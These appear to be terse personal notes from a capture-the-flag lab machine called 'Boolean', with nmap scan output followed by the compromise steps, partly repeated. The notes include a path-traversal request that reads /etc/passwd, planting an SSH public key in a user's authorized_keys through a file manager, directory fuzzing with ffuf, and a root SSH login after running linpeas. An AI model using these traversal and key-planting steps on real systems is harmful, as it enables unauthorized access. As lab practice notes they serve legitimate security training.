PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 61
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
.....
| http-title: Boolean
|_Requested resource was http://192.168.203.231/login
33017/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Development
|_http-server-header: Apache/2.4.38 (Debian)
Regsister a new user and login
confirm the email info
--> Add confirmed
Refresh the web broswer, we get a file manager page
we can upload a php reverse file but where to call it?
Go to /?cwd=../../../../../../home/remi/.ssh&file=&download=false
upload our pub key (under ~/.ssh dir ) as authorized_keys
so, we can ssh to the host as remi
ssh -i ~/.ssh/id_ed25519 remi@192.168.203.231
PE
linpeas
-->
ssh -i root root@127.0.0.1
(Run ssh-add -D when met the msg "Received disconnect from 123.456.78.901 port 22:2: Too many authentication failures
Disconnected from 123.456.78.901 port 22")
Regsister a new user and login confirm the email info
Refresh the web broswer, we get a file manager page
we can upload a php reverse file but where to call it?
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.203.231/FUZZ -b "_boolean_session=P9L7IBVIpmr.. ( login session ).....-->didn't find useful infoTry LFI : /?cwd=../../../../../../etc&file=passwd&download=false -->
-->
root:x:0:0:root:/root:/bin/bash
remi:x:1000:1000::/home/remi:/bin/bash
Go to /?cwd=../../../../../../home/remi/.ssh&file=&download=false
upload our pub key (under ~/.ssh dir ) as authorized_keys
so, we can ssh to the host as remi ssh -i ~/.ssh/id_ed25519 remi@192.168.203.231
PE
linpeas
--> ssh -i root root@127.0.0.1 (Run ssh-add -D when met the msg "Received disconnect from 123.456.78.901 port 22:2: Too many authentication failures Disconnected from 123.456.78.901 port 22")